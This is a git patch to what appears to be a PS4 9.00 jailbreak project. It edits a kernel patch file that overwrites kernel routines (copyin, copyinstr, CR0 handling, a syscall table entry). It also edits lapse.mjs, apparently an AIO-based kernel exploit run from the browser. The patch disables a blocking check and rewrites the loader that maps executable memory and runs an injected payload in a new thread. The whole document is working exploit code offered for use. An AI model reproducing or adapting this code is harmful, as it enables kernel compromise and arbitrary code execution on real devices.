From 5137f7bf533943ca62495c45d7703a8b37056268 Mon Sep 17 00:00:00 2001
From: Kameleon <77245601+kmeps4@users.noreply.github.com>
Date: Wed, 28 May 2025 17:52:50 -0600
Subject: [PATCH] ABC Fix: the number of blocking requests needed to be 2

---
 kpatch/900.c   |   5 +++--
 kpatch/900.elf | Bin 5288 -> 5288 bytes
 kpatch/900.o   | Bin 1912 -> 1912 bytes
 lapse.mjs      |  45 ++++++++++++++++++++++++++++++++++++++++++---
 4 files changed, 45 insertions(+), 5 deletions(-)

diff --git a/kpatch/900.c b/kpatch/900.c
index 2ff5a67..b1be105 100644
--- a/kpatch/900.c
+++ b/kpatch/900.c
@@ -97,9 +97,10 @@ void do_patch(void) {
     write8(kbase, KERNEL_copyinstr, 0xEB);
     write8(kbase, KERNEL_copystr, 0xEB);
     write16(kbase, KERNEL_veriPatch, 0x9090);
-    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);        
+    write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
+        
     const size_t offset_sysent_11 = 0x1100520;
-    write32(kbase, offset_sysent_11, 2);
+    write32(kbase, offset_sysent_11, 6);
     write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
     write32(kbase, offset_sysent_11 + 0x2c, 1);  
    
diff --git a/kpatch/900.elf b/kpatch/900.elf
index a38fa6b29ce522f871cba606f666f29f17bcfd66..f33a519136e025829af7f5544e252425491b742f 100644
GIT binary patch
delta 14
VcmZ3Xxk7V;svslVW;MYkW&k561OEU3

delta 14
VcmZ3Xxk7V;svslNW;MYkW&k4(1N#5~

diff --git a/kpatch/900.o b/kpatch/900.o
index 2e7e5bee06362fc07e6278ec171f0d5185fbb020..47bd1c5bc208aaa93cbdd62ea9014ea71656fbcf 100644
GIT binary patch
delta 14
Vcmeyt_k(YPCnF=<W-mrPHUKF;1V8`)

delta 14
Vcmeyt_k(YPCnF=%W-mrPHUKFm1Uvu$

diff --git a/lapse.mjs b/lapse.mjs
index 0ad0e6e..d506e9b 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1619,7 +1619,7 @@ function setup(block_fd) {
     }
     aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
 
-    {
+    /*{
         const reqs1 = make_reqs1(1);
         const timo = new Word(1);
         const id = new Word();
@@ -1631,7 +1631,7 @@ function setup(block_fd) {
             die(`SceAIO system not blocked. errno: ${err}`);
         }
         free_aios(id.addr, 1);
-    }
+    }*/
 
     log('heap grooming');
     // chosen to maximize the number of 0x80 malloc allocs per submission
@@ -1745,7 +1745,7 @@ export async function kexploit() {
     }
 }
 
-kexploit().then(() => {
+/*kexploit().then(() => {
     var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
     var payload_loader = new View4(window.pld);
     chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
@@ -1760,4 +1760,43 @@ kexploit().then(() => {
         payload_loader.addr,
         payload_buffer,
     );
+})*/
+
+
+kexploit().then(() => {
+    function malloc(sz) {
+        var backing = new Uint8Array(0x10000 + sz);
+        nogc.push(backing);
+        var ptr = mem.readp(mem.addrof(backing).add(0x10));
+        ptr.backing = backing;
+        return ptr;
+    }
+
+    function malloc32(sz) {
+        var backing = new Uint8Array(0x10000 + sz * 4);
+        nogc.push(backing);
+        var ptr = mem.readp(mem.addrof(backing).add(0x10));
+        ptr.backing = new Uint32Array(backing.buffer);
+        return ptr;
+    }
+    window.pld_size = new Int(0x26200000, 0x9);
+
+    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
+    var payload = window.pld;
+    var bufLen = payload.length * 4
+    var payload_loader = malloc32(bufLen);
+    var loader_writer = payload_loader.backing;
+    for (var i = 0; i < payload.length; i++) {
+        loader_writer[i] = payload[i];
+    }
+    chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
+    var pthread = malloc(0x10);
+
+    call_nze(
+        'pthread_create',
+        pthread,
+        0,
+        payload_loader,
+        payload_buffer,
+    );
 })